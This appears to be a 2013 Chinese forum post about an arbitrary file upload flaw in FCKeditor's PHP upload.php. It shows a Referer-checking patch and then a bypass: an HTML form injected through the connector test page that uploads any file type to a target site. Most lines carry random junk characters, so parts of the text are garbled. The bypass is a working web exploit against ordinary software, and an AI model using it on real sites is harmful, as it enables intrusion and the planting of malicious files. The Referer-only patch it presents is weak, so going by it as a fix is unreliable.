漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php) j6 L3 ~, P8 i4 r& P. H0 v% {
网上给出的修复方案是5 H3 V) \2 h* j9 ?, a3 E& K
修复方法,删除FCK编辑器用其他的编辑器1 e2 o+ e7 m; K' g
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件' C \- J$ j& m( F0 E
在 U: }6 H: ]5 H: ^
require(‘config.php’);1 i7 C# ?' k" E- P+ t5 {
require(‘util.php’);6 j3 Z! x; Y9 O) W8 A9 y$ n
的下面添加以下代码—————————–
5 _+ B- p5 i& ]6 ?: i5 X* L//防止外部提交
e; W. ?$ W# @0 ^function outsidepost()6 u2 N& \0 z% K
{: ]6 Z1 B2 M0 r* X' ]
$servername=$_SERVER['SERVER_NAME'];
( V4 z2 j/ ~# V+ ]' m$sub_from=@$_SERVER['HTTP_REFERER'];
Z, g# g1 S. q7 e$sub_len=strlen($servername);, U: V* d9 G6 V2 [/ V1 Z
$checkfrom=substr($sub_from,7,$sub_len);( G7 u4 p1 o' v6 h% }& L+ ~" D, w/ C
if($checkfrom!=$servername){
6 @: ^2 y( ] V( ^echo(“you don’t outsidepost!”); _ l1 T0 V; X* m# A
exit;4 ?& k- R* {' }
}
3 E4 Y9 ?1 {2 p}5 S" H6 [8 p" d4 }. Y
outsidepost();0 A8 |: y9 m" n- H# z
防止外部提交,但是没有防止内部提交,4 _. S( h4 Q9 p+ g @) n6 w# O* Q% ]+ D
利用方法:7 H9 y$ k5 l7 v/ H
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 @% _4 B" q8 q) v
2,在Current Folder 框输入* q- ` J$ s) E8 A$ n7 w2 W, @
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
\. B6 [' o( c5 B然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
+ a1 N8 m* ?2 F v( n1 H2 [PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对